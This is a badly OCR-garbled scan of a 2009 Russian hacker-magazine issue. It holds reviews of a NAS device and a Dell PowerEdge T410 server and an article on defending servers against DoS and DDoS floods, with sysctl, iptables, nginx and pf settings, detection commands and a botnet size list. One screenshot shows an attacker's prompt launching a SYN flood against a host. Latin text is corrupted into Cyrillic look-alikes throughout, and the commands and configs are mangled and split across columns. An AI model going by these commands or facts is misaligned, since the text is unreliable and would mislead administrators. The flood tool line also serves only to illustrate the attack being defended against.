нескольким NА5-системам, и может произво- 
дить бэкап данных на другую ^5-систему по 
сети в автоматизированном режиме. 

Особого внимания заслуживает ОС на базе ядра 
Ыпих 2.6, которая размещена во встроенной 



флеш-памяти объемом 512 Мб. Ыпих обеспечива- 
ет такие возможности как: использование произ- 
водительной журналируемой файловой системы 
ХР5, квоты для пользователей и групп, списки кон- 
троля доступа (АСЬ) , универсальные блокировки, 
которые позволяют избежать повреждения дан- 
ных при доступе к одному файлу по нескольким 
протоколам, шифрование (алгоритм АЕ5 256), 
создание виртуальных локальных сетей (ѴЬАЛ), 
фильтрация МАС/ІР-адресов и, конечно же, высо- 
кая производительность при доступе к данным. 
Система поддерживает стандартный набор 
протоколов, обеспечивающих доступ к дан- 
ным: 5МВ/СІР5, N55, РТР/РТР5, и умеет рабо- 
тать со службой каталогов Асгіѵе БігесГогу. Для 
управления используется ѵѵеЪ-интерфейс, а для 
мониторинга — протокол 5NМРѵЗ. В состав ПО 
также входят клиенты ТРТР и БНСР. Предусмот- 
рен механизм оповещения о событиях, сбоях и 
аномалиях. Для большей надежности адми- 



нистратор может оснастить устройство допол- 
нительным источником питания (КР51000) 
и устройством бесперебойного питания (АРС 
5тагг-ЫР5). 

В корпус установлен блок питания мощностью 
150 Вт. Его с лихвой хватает для питания всех 
компонентов устройства (по заявлениям ком- 
пании-производителя, N554000 потребляет 53 
Ватта энергии при установке 4 жестких дисков 
по 250 Гб каждый). Вентиляторы оснащены 
термальными сенсорами, которые приостанав- 
ливают их вращение, если температура внутри 
корпуса опускается до приемлемого уровня. 
Температурные пороги, при которых устройс- 
тво не должно давать сбои, составляют от 0 до 
45 градусов. 

Срок гарантии - 2 года плюс 1 год, в течение ко- 
торого владелец может заменить вышедший из 
строя вентилятор или блок питания. 
Стоимость: 33000 руб. 
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Производительность 
за гранью возможного 



Оеіі РоѵѵегЕсІде Т4Ю: 
двухпроцессорный сервер в корпусе Тоѵѵег 




Технические характеристики 
ОеІІ РоѵѵегЕсІде Т41 о 

> Процессор: 

До 2 процессоров ІпіеІХеоп серии 5500 

> Чипсет: 

Іпіеі 5500 

> Память: 

До 64 Гб (8 разъемов БІММ2] памяти ББРЗ 
1333/1066/800 МГц 

Без буфера с ЕСС или регистровые с ЕСС 
при 1333/1066/800 МГц 

> Жесткие диски: 

До 6 жестких дисков 5АТА/5А5 (2,5” или 3,5”, 
поддержка смешанных конфигураций] с 
возможностью «горячего» подключения 
Максимальный объем: 6 Тб 



> Поддержка РАШ: 

РАІЭ-контроллер в качестве опции (РЕКС 6 і , 
5А5 6/іР, РЕРС 6/Е, 5А5 6Е) 

> Сетевой интерфейс: 

Двухпортовый контроллер СідаЬіІ Еібегпеі 
(Вгоабсот ЫеШгете II 5716] 

> Питание: 

Без резервирования, 525 Вт (эффективность 
более 80%) 

Резервирование (опционально], 500 Вт 
(эффективность более 80%, ВОЮ) 
Автонастройка (100-240 В) 

> Расширение: 

2 разъема РСІ-Ехргезз х8 (маршрутизация 
х4, Веп2), половинной длины 
1 разъем РСІ-Ехргезз х 1 6 (маршрутизация 
х8,Веп2], половинной длины 
1 разъем РСІ-Ехргезз х8 (маршрутизация х4, 
Вепі], максимальной длины 
1 разъем РСІ-Ехргезз х8 (маршрутизация х4, 
Сеп2], максимальной длины 



> Внешние порты ввода-вывода: 

6 портов 115В 2.0 (2 спереди) 

4 порта Р 3 -45 
1 последовательный порт 
1 разъем ѴСА 

> Функции управления: 

Передняя панель с ЖК-экраном 
Бе II ОрепМападе с консолью управления Бе II 
ВМС, совместимый с ІРМІ 2.0 
Опционально: ІБРАС6 Ехргезз, ІБРАС6 
Епіегргізе и ѴІІазб 

> Другое: 

Встроенная графическая плата Маігох 
С200еѴѴ (8 Мб] 

> Исполнение: 

Тоѵѵег (444,9 х 217,9 х 616,8 мм) 

> Гарантийное обслуживание: 

Срок гарантии: 3 года 



Башенный сервер РоѵѵегЕсІде Т410 в первую 
очередь интересен тем, что входит в линей- 
ку одиннадцатого поколения серверных 
продуктов РоѵѵегЕсІде, с помощью которого 
компания БеП намерена вывести свои систе- 
мы на новый уровень и потягаться силами с 
гигантами в лице ІВМ и НР. РоѵѵегЕсІде Т410 
— это недорогой и производительный сервер 
начального уровня, предназначенный для 
небольших компаний, офисы которых не ос- 
нащены серверными комнатами. Это млад- 
шая модель линейки РоѵѵегЕсІде, не унаследо- 
вавшая всех передовых нововведений своих 
старших братьев, но обладающая чрезвычай- 
но привлекательными характеристиками и 
невысокой ценой. Сервер построен на базе 
двух процессоров линейки Іпіеі Хеоп 5500 и 
может быть оснащен до 64 Гб оперативной 
памяти ББКЗ с поддержкой резервирования 
и коррекции ошибок. В качестве устройств 
хранения могут быть использованы 6 жест- 



ких дисков 5АТА/5А5 (2,5” или 3,5”), каждый 
из которых располагается в корзине «горя- 
чей» замены (предусмотрены и гибридные 
корзины 3,5” для дисков 2,5”). На материнс- 
кой плате расположено четыре разъема РСІ- 
Ехргезз х8 и один РСІ-Ехргезз хіб. 
Внутренний дизайн корпуса нагляден и 
прост. Все компоненты закреплены таким 
образом, что отвертка потребуется только в 
случае замены основного блока питания. С 
внешней стороны на передней панели уста- 
новлен программируемый ЖК-дисплей. На 
нем отображается информация о состоянии 
системы, потребляемой мощности и темпе- 
ратуре внутри корпуса. 

В отличие от своих старших собратьев, 
РоѵѵегЕсІде Т410 оснащен стандартной и не 
совсем удобной системой удаленного управ- 
ления ОрепМападе. Дополнительно в сервер 
можно установить карту удаленного доступа 
ЙЖАС6 Ехргезз или ШКАС6 Епіегргізе, кото- 



рая позволяет удаленно производить мони- 
торинг, исправление возникающих проблем 
и обновления через графический интерфейс, 
вне зависимости от состояния операцион- 
ной системы. Помимо этого, карта оснащена 
специальным твердотельным накопителем, 
который содержит драйвера для всех под- 
держиваемых ОС, микрокод, ВІ05, утилиты 
настройки и опциональный загрузочный 
образ. 

Сервер отличается высоким уровнем энергос- 
бережения и низким уровнем шума, благодаря 
технологии Епег^у Зтагц использованию про- 
цессоров Іпіеі Хеоп 5500 с интеллектуальной 
системой регулирования производительности 
и подачи питания, а также блокам питания с 
высоким КПД. 

Гарантия на сервер составляет 3 года с возмож- 
ностью серверного обслуживания в системе 
Веіі РгоЗирроП. 

Стоимость: от 35000 руб. 
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I ЕВГЕНИЙ ЗОБНИН/ЛМгаЗѴЫАСК.РІІ/ 



Устоять 
любой ценой 

Методы борьбы с ОоБ/ОйоБ-атаками 

Твое утро начинается с чтения багрепортов и анализа логов. Ты еже- 
дневно обновляешь ПО и ежечасно дорабатываешь правила брандмау- 
эра. Бпогітвой лучший друг, а 2аЬЬіх — невидимый помощник. Ты пост- 
роил настоящий бастион, к которому не подобраться ни с одной стороны. 
Но! Ты совершенно беззащитен против самой коварной и подлой атаки 
на свете — РОоЗ. 



Трудно сказать, когда впервые появился 
термин БоЗ-атака. Специалисты говорят о 
1996-м, попутно намекая, что до широких 
масс этот тип атак «дошел» только в 1999 
году, когда один за другим попадали ѵѵеЪ-сай- 
ты Атагоп, УаЬоо, СЫЫ и еВау. Еще раньше 
БоЗ-эффект использовали для тестирования 
устойчивости систем и каналов связи. А если 
копнуть глубже и воспользоваться термином 
БоЗ для обозначения явления, то становится 
ясно, что он существовал всегда, со времен 
первых мейнфреймов. Вот только задумы- 
ваться о нем как о средстве устрашения нача- 
ли гораздо позже. 

Говоря простым языком, БоЗ-атаки — это не- 
который вид злонамеренной деятельности, 
ставящей своей целью довести компьютер- 
ную систему до такого состояния, когда она 
не сможет обслуживать правомерных пользо- 
вателей или правильно выполнять возложен- 
ные на нее функции. К состоянию «отказ в об- 
служивании» обычно приводят ошибки в ПО 
или чрезмерная нагрузка на сетевой канал 
или систему в целом. В результате, ПО либо 
вся операционная система машины «падает» 
или же оказывается в «зацикленном» состоя- 
нии. А это грозит простоями, потерей посети- 
телей/клиентов и убытками. 

АНАТОМИЯ БОБ-АТАК БоЗ-атаки подраз- 
деляются на локальные и удаленные. К 
локальным относятся различные эксплойты, 
форк-бомбы и программы, открывающие по 
миллиону файлов или запускающие некий 
циклический алгоритм, который сжирает 
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память и процессорные ресурсы. На всем 
этом мы останавливаться не будем. А вот уда- 
ленные БоЗ-атаки рассмотрим подробнее. 
Они делятся на два вида: 

1 . Удаленная эксплуатация ошибок в ПО с це- 
лью привести его в нерабочее состояние. 

2. Ріооб — посылка на адрес жертвы огром- 
ного количества бессмысленных (реже — 
осмысленных) пакетов. Целью флуда может 
быть канал связи или ресурсы машины. В 
первом случае поток пакетов занимает весь 
пропускной канал и не дает атакуемой ма- 
шине обрабатывать легальные запросы. Во 
втором — ресурсы машины захватываются 
с помощью многократного и очень частого 
обращения к какому-либо сервису, выполня- 
ющему сложную, ресурсоемкую операцию. 
Это может быть, например, длительное об- 
ращение к одному из активных компонен- 
тов (скрипту) ѵѵеЪ-сервера. Сервер тратит 
все ресурсы машины на обработку запросов 
атакующего, а пользователям приходится 
ждать. 

В традиционном исполнении (один атаку- 
ющий — одна жертва) сейчас остается эф- 
фективным только первый вид атак. Класси- 
ческий флуд бесполезен. Просто потому что 
при сегодняшней ширине канала серверов, 
уровне вычислительных мощностей и пов- 
семестном использовании различных анти- 
БоЗ приемов в ПО (например, задержки при 
многократном выполнении одних и тех же 
действий клиентом), атакующий превраща- 
ется в надоедливого комара, не способного 
нанести какой бы то ни было ущерб. Но если 



этих комаров наберутся сотни, тысячи или 
даже сотни тысяч, они легко положат сервер 
на лопатки. Толпа — страшная сила не только 
в жизни, но и в компьютерном мире. Распре- 
деленная атака типа «отказ в обслуживании» 
(ББоЗ), обычно осуществляемая с помощью 
множества зомбифицированных хостов, мо- 
жет отрезать от внешнего мира даже самый 
стойкий сервер, и единственная эффектив- 
ная защита — организация распределенной 
системы серверов (но это по карману далеко 
не всем, привет Соо^іе) . 

МЕТОДЫ БОРЬБЫ Опасность большинства 
ББоЗ-атак — в их абсолютной прозрачности 
и «нормальности». Ведь если ошибка в ПО 
всегда может быть исправлена, то полное 
сжирание ресурсов — явление почти обыден- 
ное. С ним сталкиваются многие админис- 
траторы, когда ресурсов машины (ширины 
канала) становится недостаточно, или ѵѵеЪ- 
сайт подвергается слэшдот-эффекту Пѵ\чГ 
сот стал недоступен уже через несколько ми- 
нут после первого известия о смерти Майкла 
Джексона) . И если резать трафик и ресурсы 
для всех подряд, то спасешься от ББоЗ, но 
потеряешь добрую половину клиентов. 
Выхода из этой ситуации фактически нет, 
однако последствия ББоЗ-атак и их эффек- 
тивность можно существенно снизить за 
счет правильной настройки маршрутиза- 
тора, брандмауэра и постоянного анализа 
аномалий в сетевом трафике. В следующей 
части статьи мы последовательно рассмот- 
рим: 
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• способы распознавания начинающейся ББоЗ-атаки; 

• методы борьбы с конкретными типами ББоЗ-атак; 

• универсальные советы, которые помогут подготовиться к Бо5- 
атаке и снизить ее эффективность. 

В самом конце будет дан ответ на вопрос: что делать, когда началась 
ОБоЗ-атака. 

БОРЬБА С Р 1.00 Б- АТАКАМ И Итак , существует два типа ИоЗ/ИИоЗ- 
атак, и наиболее распространенная из них основана на идее флуда, 
то есть заваливании жертвы огромным количеством пакетов. Флуд 
бывает разным: ІСМР-флуд, ЗУИ-флуд, ЕГОР-флуд и НТТР-флуд. Сов- 
ременные БоЗ-боты могут использовать все эти виды атак одновре- 
менно, поэтому следует заранее позаботиться об адекватной защите 
от каждой из них. 

1. ІСМР-флуд. 

Очень примитивный метод забивания полосы пропускания и созда- 
ния нагрузок на сетевой стек через монотонную посылку запросов 
ІСМР ЕСНО (пинг). Легко обнаруживается с помощью анализа по- 
токов трафика в обе стороны: во время атаки типа ІСМР-флуд они 
практически идентичны. Почти безболезненный способ абсолютной 
защиты основан на отключении ответов на запросы ІСМР ЕСНО: 

# зузсЫ пеЬ . ірѵ4 . істр_есйо_ідпоге_а11=1 

Или с помощью брандмауэра: 

# ірІіаЫез -А ІЫРІІТ -р ісшр БКОР - -істр-Руре 8 

2.5У]Ч-флуд. 

Один из распространенных способов не только забить канал связи, 
но и ввести сетевой стек операционной системы в такое состояние, 



След в истории 

1997 год — ББоЗ-атакана ѵѵеЬ-сайтМісгозоГі:. Один день молчания. 
1999 год — «вне зоны действия» оказались ѵѵеЪ-сайты Уайоо, СЫН, 
еВауидр. 

Октябрь 2002 — атака на корневые БНЗ-серверы интернета. На 
некоторое время были выведены из строя 7 из 13 серверов. 

21 февраля 2003 года — ББоЗ-нападение на Ыѵеіоигпаі.сот. Два 
дня сервис находился в парализованном состоянии, лишь иногда пода- 
вая признаки жизни. 



когда он уже не сможет принимать новые запросы на подключение. 
Основан на попытке инициализации большого числа одновремен- 
ных ТСР-соединений через посылку ЗУЫ-пакета с несуществующим 
обратным адресом. После нескольких попыток отослать ответный 
АСК-пакет на недоступный адрес большинство операционок ставят 
неустановленное соединение в очередь. И только после п-ой попытки 
закрывают соединение. Так как поток АСК-пакетов очень велик, вско- 
ре очередь оказывается заполненной, и ядро дает отказ на попытки 
открыть новое соединение. Наиболее умные БоЗ-боты еще и анали- 
зируют систему перед началом атаки, чтобы слать запросы только на 
открытые жизненно важные порты. Идентифицировать такую атаку 
просто: достаточно попробовать подключиться к одному из сервисов. 
Оборонительные мероприятия обычно включают в себя: 

• Увеличение очереди «полуоткрытых» ТСР-соединений: 

# зузсЫ -ѵі пеіі . ірѵ4 . 1:ср_тах_зуп_Ьаск1од=102 4 
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Борьба с ВЭо8 
воТгееВБО 

Уменьшаем время ожидания ответного пакета на запрос 5У1Ч-АСК 
(защита от ЗУЫ-флуда) : 



# зузсЕІ пек . іпеЕ . Еср .тз1=7500 



Превращаем сервер в черную дыру. Так ядро не будет слать ответ- 
ные пакеты при попытке подключиться к незанятым портам (сни- 
жает нагрузку на машину во время ЭЭоЗ'а на случайные порты) : 



# зузсСІ пеС . іпеС . Сер . Ыаск1іо1е=2 

# зузсСІ пеС . іпеС . исір . ЫаскСю1е=1 



Ограничиваем число ответов на ІСМР-сообщения 50-ю в секунду 
(защита от ІСМР-флуда) : 




ЛОГИ ТСР011МР можно отослать на проверку 
В5Т0Р0005.0Р6. БЕСПЛАТНО 



# зузсСІ пеС . іпеС . іешр . ісшр1іш=50 

Увеличиваем максимальное количество подключений к серверу 
(защита от всех видов ЭЭо5) : 

# зузсСІ кегп . ірс . зошахсопп=327б8 

Включаем ЭЕУ1СЕ_РОЬиМС — самостоятельный опрос сетевого 
драйвера ядром на высоких нагрузках (существенно снижает на- 
грузку на систему во время ЭЭоЗ'а) : 

1. Пересобираем ядро с опцией «оргіопз ЭЕѴІСЕ_РОШ]МС»; 

2. Активируем механизм поллинга: «зузей кегп.роШп^.епаЫе = 1»; 

3. Добавляем запись «кегп.роШп^.епаЫе = 1» в /ещ/зузсні.сопк 

• Уменьшение времени удержания «полуоткрытых» соединений: 

# зузсСІ -ѵі пеС . ірѵ4 . Сср_зупаск_геСгіез=1 

• Включение механизма ТСР зупсоокіез: 



Часто целью флуда становится не корень ѵѵеЪ-сервера, а один из 
скриптов, выполняющих ресурсоемкие задачи или работающий с 
базой данных. В любом случае, индикатором начавшейся атаки 
будет служить аномально быстрый рост логов ѵѵеЪ-сервера. Ме- 
тоды борьбы с НТТР-флудом включают в себя тюнинг ѵѵеЪ-серве- 
ра и базы данных с целью снизить эффект от атаки, а также от- 
сеивание Эо5-ботов с помощью различных приемов. Во-первых, 
следует увеличить максимальное число коннектов к базе данных 
одновременно. Во-вторых, установить перед ѵѵеЪ-серверомАрасІіе 
легкий и производительный п^іпх — он будет кэшировать запросы 
и отдавать статику. Это решение из списка «тши Ьаѵе», которое не 
только снизит эффект Эо5-атак, но и позволит серверу выдержать 
огромные нагрузки. Небольшой пример: 

# ѵі /еіс/пдіпх/пдіпх.согй 

# Увеличиваем максимальное количество используемых фай- 
лов 

ѵ^огкег_г1ішіС_поіі1е 80000; 
еѵепбз { 



# зузебі -ѵг пеб . ірѵ4 . бср_зупсоокіез=1 

• Ограничение максимального числа «полуоткрытых» соедине- 
ний с одного ІР к конкретному порту: 

# ірРаЫез -I ШРБТ -р Сер --зуп --брогР 80 -т іріітір 
--ірІітіР-аЬоѵе 10 -д БКОР 



# Увеличиваем максимальное количество соединений 
ѵ\гагкег_соппесііопз 65536; 

# Использовать эффективный метод ероіі для обработки 
соединений 

изе ероіі; 



3. ЕГОР-флуд. 

Типичный метод захламления полосы пропускания. Основан на бес- 
конечной посылке ЕГОР-пакетов на порты различных ЕЮР-сервисов. 

Легко устраняется за счет отрезания таких сервисов от внешнего 
мира и установки лимита на количество соединений в единицу вре- 
мени к ЭЫ5-серверу на стороне шлюза: 

Кгакеп — 400 тысяч компьютеров. 

# ірбаЫез -I ШРБТ -р ибр --брогб 53 БКОР -ш іріішіб ЗгігЪі — 315 тысяч компьютеров. 

--ірІішіб-аЬоѵе 1 ВоЬах — 185 тысяч компьютеров. 

КизШск — 150 тысяч компьютеров. 

4. НТТР-флуд . 5югт — 100 тысяч компьютеров. 

Один из самых распространенных на сегодняшний день спосо- РзуЪог — 100 тысяч АЭЗБ-маршрутизаторов, основанных на Ьншх. 
бов флуда. Основан на бесконечной посылке НТТР-сообщений Ботнет ВВС — 22 тысячи компьютеров. Экспериментальный ботнет, 
СЕТ на 80-й порт с целью загрузить ѵѵеЪ-сервер настолько, что- созданный компанией ВВС. 
бы он оказался не в состоянии обрабатывать остальные запросы. 
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Крупнейшие 

ботнеты 








ѵісЪіт# пеЪзЪаІ: -ап 
192.168. 81.1.23 


| дгер "ЗУ^КСУБ" 
113.124,90.79.17564 


0 


0 


4 9312 


0 


ЗУН_НСТО 


192. 168 . 81.1.23 


21.230.247.14.28218 


0 


0 


49312 


0 


ЗУН_ЕСТО 


192. 168 . 81.1.23 


136.168.88.132.38859 


0 


0 


4 9312 


0 


ЗУНКСТО 


192.168 . 81.1.23 


5.112 . 17.14.5174 


0 


0 


49312 


0 


ЗУ N „КСТО 


192.168. 81.1.23 


61.199.84 . 97.34557 


0 


0 


4 9312 


0 


ЗУМ КСТО 


192. 168 . 81.1.23 


152.193.254.8.29844 


0 


0 


4 9312 


0 


ЗУН_РСТО 


192. 168 . 81.1.23 


77.123.221.130.11851 


0 


0 


4 9312 


0 


ЗУН_КСТО 


192. 168 . 81.1.23 


243,113.58.156.40921 


0 


0 


4 9312 


0 


ЗУН_КСТО 



МНОГО СОЕДИНЕНИЙ, ПОМЕЧЕННЫХ ФЛАГОМ 5УЫ 
ВСѴБ — ПОВОД БИТЫРЕВОГУ 



ЬЪЪр { 

дгір о^^; 

# Отключаем таймаут на закрытие кеер-аііѵе 
соединений 

кеера1іѵе_Ьітеоик 0; 

# Не отдавать версию пдіпх в заголовке от- 
вета 

зегѵег_Докепз о^^; 

# Сбрасывать соединение по таймауту 
гезек_кітес!оик_соппескіоп оп; 

} 

# Стандартные настройки для работы в качестве 

прокси 

зегѵег { 

Іізбеп 111.111.111.111 беіаиіб беіеггеб; 
зегѵег_пате козб . сот ѵллпл . Ьозб . сот; 
1од_1огтаб ІР $гетобе_аббг ; 

Іосабіоп / { 

ргоху_разз ЬДСр : //127 . 0 . 0 . 1/ ; 

} 

Іосабіоп ~* \ . ( зред I зрд I діі I рпд | с з з I д з I рб 
1 I РхР | баг) $ { 

гооб /коте/тлплплг/козк . сот/кббрбосз ; 

} 

} 

В случае необходимости можно задействовать п^іпх-мо- 
дуль п§хДшр_1ітіі:_^_пюс1іі1е, ограничивающий ко- 
личество одновременных подключений с одного адреса 

( Ь«р://5 У 5оеѵ.ги/п 8 іпх/сіос5/Ь«р/п§х Ькр ИшК гед 
тоскйе.Ьйп!) . 



Наивный Іпііегпе* 

Во времена своего рассвета БоЗ-атаки были настоящей катастрофой для 
серверов и обычных рабочих станций. ѴѴеЪ-сайт можно было легко завалить с 
помощью одного-единственного хоста, реализующего атаку типа Зтигб Рабочие 
станции с установленной ОС ѴѴіпсіоѵѵз падали, как доминошки, от атак типа Ріп§ 
оШеагіі, Ьапсі, ѴѴіпШке. Сегодня всего этого не стоит опасаться. 



Ресурсоемкие скрипты можно защитить от ботов с по- 
мощью задержек, кнопок «Нажми меня», выставления 
кукисов и других приемов, направленных на проверку 
«человечности». 

УНИВЕРСАЛЬНЫЕ СОВЕТЫ Чтобы не попасть в безвы- 
ходное положение во время обрушения ОБоЗ-шторма на 
системы, необходимо тщательным образом подготовить 
их к такой ситуации: 

1 . Все сервера, имеющие прямой доступ во внешнюю сеть, 
должны быть подготовлены к простому и быстрому уда- 
ленному ребуту (55ІКІ спасет отца русской демократии). 
Большим плюсом будет наличие второго, администра- 
тивного, сетевого интерфейса, через который можно 
получить доступ к серверу в случае забитости основного 
канала. 

2. ПО, используемое на сервере, всегда должно находить- 
ся в актуальном состоянии. Все дырки — пропатчены, 
обновления установлены (простой, как сапог, совет, ко- 
торому многие не следуют) . Это оградит тебя отБоЗ-атак, 
эксплуатирующих баги в сервисах. 

3. Все слушающие сетевые сервисы, предназначенные для 
административного использования, должны быть спря- 




> іпіо 



• Подробнее о прото- 
коле ЫеіРІоѵѵ можно 
прочитать в статье 
«Поток пакетов — на 
контроль!», опубли- 
кованной в июльском 
номере т за 2007 
год. 

• Поипб-гоЬіп — 
алгоритм вырав- 
нивания нагрузки 
распределенной 
вычислительной 
системы методом пе- 
ребора ее элементов 
по круговому циклу. 



Интеллектуальные системы 

Интересную альтернативу решениям Сізсо выпускает компания Кеасгіѵе ИеГѵѵогкз Гшѵѵтѵ.геасгіѵепегшогкз.сот) . Их про- 
дукт под названием РІоосЮиагсІ представляет собой аппаратный комплекс, состоящий из детекторов и исполнительных 
модулей. Детекторы, установленные на брандмауэрах, маршрутизаторах и свитчах, постоянно мониторят трафик и со- 
здают его профиль на основе таких параметров, как объем пакетов, источник, направление, тип и т.д. В случае возникно- 
вения аномалий детектор посылает все подробности о произошедшем исполнительным модулям, располагающимся на 
маршрутизаторах в разных сегментах сети. Получив сообщение от детектора, исполнительные модули начинают дейс- 
твовать: они отыскивают паразитный трафик в проходящих пакетах и, в случае удачи, оповещают об этом предыдущие 
по ходу трафика модули и посылают им инструкции по активации фильтров на маршрутизаторах. В результате, перед 
потоком флуд-трафика должен образоваться заслон, который будет быстро перемещаться в сторону его источника. 



• В поставку 
ОрепВЗО входит 
утилита І с р сі го р ( 8 ] , 
с помощью которой 
можно отбросить 
ТСР-подклю- 
чение (ісрсі гор 
192.168.1.1:80 
192.168.1.12:26747]. 
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5ѴЫХАСК 



таны брандмауэром ото всех, кто не должен иметь к ним доступ. Тог- 
да атакующий не сможет использовать их для проведения Эо5-атаки 
или брутфорса. 

4. На подходах к серверу (ближайшем маршрутизаторе) должна быть 
установлена система анализа трафика (ЫеііРІоѵѵ в помощь), которая 
позволит своевременно узнать о начинающейся атаке и вовремя 
принять меры по ее предотвращению. 

Добавь в /еИсЛузсб.соп! следующие строки: 

# ѵі /еіс/зузсіі.соггі 

# Защита от спуфинга 

пек . ірѵ4 . сопк . сіе Раи 11: . гр_:Еі1Гег = 1 

# Проверять ТСР-соединение каждую минуту . Если на другой 
стороне — легальная машина, она сразу ответит. Дефолто- 
вое значение — 2 часа. 



пек . ірѵ4 . Гср_кеера1іѵе_Гіте = 60 

# Повторить пробу через десять секунд 
пек . ірѵ4 . Гср_кеера1іѵе_іпГѵ1 =10 

# Количество проверок перед закрытием соединения 
пек . ірѵ4 . Гср_кеера1іѵе_ргоЪез = 5 

Следует отметить, что все приемы, приведенные в прошлом и этом 
разделах, направлены на снижение эффективности ЭЭоЗ-атак, ста- 
вящих своей целью израсходовать ресурсы машины. От флуда, заби- 
вающего канал мусором, защититься практически невозможно, и 



единственно правильный, но не всегда осуществимый способ борьбы 
заключается в том, чтобы «лишить атаку смысла». Если ты заимеешь 
в свое распоряжение действительно широкий канал, который легко 
пропустит трафик небольшого ботнета, считай, что от 90% атак твой 
сервер защищен. Есть более изощренный способ защиты. Он основан 
на организации распределенной вычислительной сети, включающей 
в себя множество дублирующих серверов, которые подключены к 
разным магистральным каналам. Когда вычислительные мощности 
или пропускная способность канала заканчиваются, все новые кли- 
енты перенаправляются на другой сервер (или же постепенно «раз- 
мазываются» по серверам по принципу гоітб-гоЪіп) . Это невероятно 
дорогая, но очень стойкая структура, завалить которую практически 
нереально. 

Другое более-менее эффективное решение заключается в покупке до- 
рогостоящих хардварных систем Сізсо ТгаШс Апотаіу Эеиесног и Сізсо 
Сиагб. Работая в связке, они могут подавить начинающуюся атаку, 
но, как и большинство других решений, основанных на обучении и 

СІ5С0ТРАРРІС АІМ0МАІ.Ѵ ОЕТЕСТОР 




Пример ограничения 
подключений 

к шеЬ-серверу 
с помощью рг 
(файлрІ.сопО 

ехИ_К='ТхрО" 

ра55 іп оп $ехМ1 іпеі: ргою Гер го $ехИ_К\ 

рогі: ѵуѵуѵу кеер зіаіе (шах 100, зоигсе-игаскгиіе, \ 
тах-зге-побез 50, тах-згс-зЩЩз 10) 



"■Г ' , МИДИ 




( ] П»Ъ№иІЖ1 0 Оепі.НіИіісгасг 

Дат @ ЦріЛтат ЫіТЦідИвп 

Г ] Египте д'щ 

ПРИНЦИП РАБОТЫ РЮОООІМКО 




► 130 



ХАКЕР 09 /1 29/ 09 






лъъасквг# нѣііа : 

л йо . /явпйір -р Ірѵ4 -р Ъср -Ья г -Ьй 2 3 ййоа-1 . якяшрія , сот 

> Зоп© 



ѵісЫтЩ ^ераищр -пі е^ЬО 33 

ЪсрсЬтр: ѵегЬове ОиІриЪ зирргезяесі, изб -V ог — ѵѵ бог биіі рго^рсо! гіееогіе 
Іів^епіпд оп еіЫЗ, 11п&-ъуре ЕЫІОмв {еьЪ&гп&ь} , сарьиг© яіі© 96 ЬуЪез ^ 

07:56:53-238310 ІР 189 Л54 „206 Л99-49552 * 192 - 168* 81 Л04 *Ъ©1 ней: $ 2350703697:235070369? 
{0) ніп 65535 

07:56:53.263726 ІР 183.154 .206.199.49552 > 192 . 168 . Н1 .104 . ЬаІмЪ : 0 2350703697 : 2350703697 
(0) ѵігг 65535 

07:56:53, 284734 ІР 191.32.219,89,39755 > І92 Л68. 81 + 1©4 ЛаІпЛ: 3 532957792:532957792(0} 
ніп 65535 

07:56:53.301734 ІР 228.43.68.93.41278 > 192.168.81 .104, Ъ&ІпеЪ: 8 3480304186 :34В0304186 {03 

ѵ#іц 65535 

07:56:53.316737 ІР 8. 217 Л34 Л 62, 6578 * 192 ,168 .81 Л 04 ЛвІМ*: 8 1477880851 Л 4778Ѳ0851 {0} 



АТАКАТИПА5ѴМ-ФЛУДД0ВАНИЯ 



анализе состояний, дают сбои. Поэтому следует хорошенько поду- 
мать перед тем, как выбивать из начальства десятки тысячи долларов 
на такую защиту. 

КАЖЕТСЯ, НАЧАЛОСЬ. ЧТО ДЕЛАТЬ? Перед непосредственным 
началом атаки боты «разогреваются», постепенно наращивая поток 
пакетов на атакуемую машину. Важно поймать момент и начать 
активные действия. Поможет в этом постоянное наблюдение за 
маршрутизатором, подключенным к внешней сети (анализ графи- 
ков ЫеііРІоѵѵ) . На сервере-жертве определить начало атаки можно 
подручными средствами. 

Наличие 5У1\[-флуда устанавливается легко — через подсчет числа 
«полуоткрытых» ТСР-соединений : 

# пеБзБаБ -па I дгер ":80\ " I дгер 8Ш_КСѴБ 

В обычной ситуации их не должно быть совсем (или очень небольшое 
количество: максимум 1-3). Если это не так — ты атакован, срочно 
переходи к дропанью атакующих. 

С НТТР-флудом несколько сложнее. Для начала нужно подсчитать 
количество процессов АрасЬе и количество коннектов на 80-й порт 
(НТТР-флуд) : 

# рз аих | дгер ІіРРрсІ I ѵіс -1 

# пеБзБаБ -па I дгер ":80\ " I ѵіс -1 



Г Пример ограничения 
подключений 
сре/^ствами индейца 

(файл ЬирЦ.сопО 

Тітеоиі 300 
КеерАІіѵе Оп 
МахКеерАНѵеКедиезІз 32 
КеерАІіѵеТітеот 15 

МіпЗрагеЗегѵегз 1 
МахЗрагеЗегѵегз 4 
ЗіагіЗегѵегз 1 
МахСНепЩ 32 



Значения, в несколько раз превышающие среднестатисти- 
ческие, дают основания задуматься. Далее следует просмот- 
реть список ІР-адресов, с которых идут запросы на подклю- 
чение: 

# пеБзБаБ -па I дгер ":80\ " I зогБ | ипід -с I зогБ -пг 
I Іезз 

Однозначно идентифицировать БоЗ-атаку нельзя, можно лишь под- 
твердить свои догадки о наличии таковой, если один адрес повторяет- 
ся в списке слишком много раз (да и то, это может говорить о посети- 
телях, сидящих за ЫАТ'ом). Дополнительным подтверждением будет 
анализ пакетов с помощью ісрдитр: 

# Рсрсіитр -п -і еБЪ.0 -з 0 -ѵг оиРриР . РхР сізБ рогР 80 апсі 
ІюзБ ІР-сервера 

Показателем служит большой поток однообразных (и не содержащих 
полезной информации) пакетов от разных ІР, направленных на один 
порт/сервис (например, корень ѵѵеЪ-сервера или определенный с§і- 
скрипт) . 

Окончательно определившись, начинаем дропать неугодных по ІР- 
адресам (будет гораздо больше эффекта, если ты сделаешь это на мар- 
шрутизаторе) : 

# ірРаЫез - А ШРОТ? -з ххх . ххх . ххх . ххх-рРср --сіезРіпаРіоп- 
рогР ЬРРр Щ БКОР 

Или сразу по подсетям: 

# ірРаЫез - А ШРОТ? -з ххх. ххх. 0.0/16-рБср --сІезБіпаРіоп- 
рогР йБРр Л БКОР 

Это даст тебе некоторую фору (совсем маленькую; зачастую ІР- 
адрес источника спуфится), которую ты должен использовать, 
чтобы обратиться к провайдеру/хостеру (с приложенными к 
сообщению логами ѵѵеЪ-сервера, ядра, брандмауэра и списком 
выявленных тобой ІР-адресов). Большинство из них, конечно, 
проигнорируют это сообщение (а хостинги с оплатой трафика 
еще и порадуются — Бо5-атака принесет им прибыль) или прос- 
то отключат твой сервер. Но в любом случае это следует сделать 
обязательно, — эффективная защита от ОБоЗ возможна только 
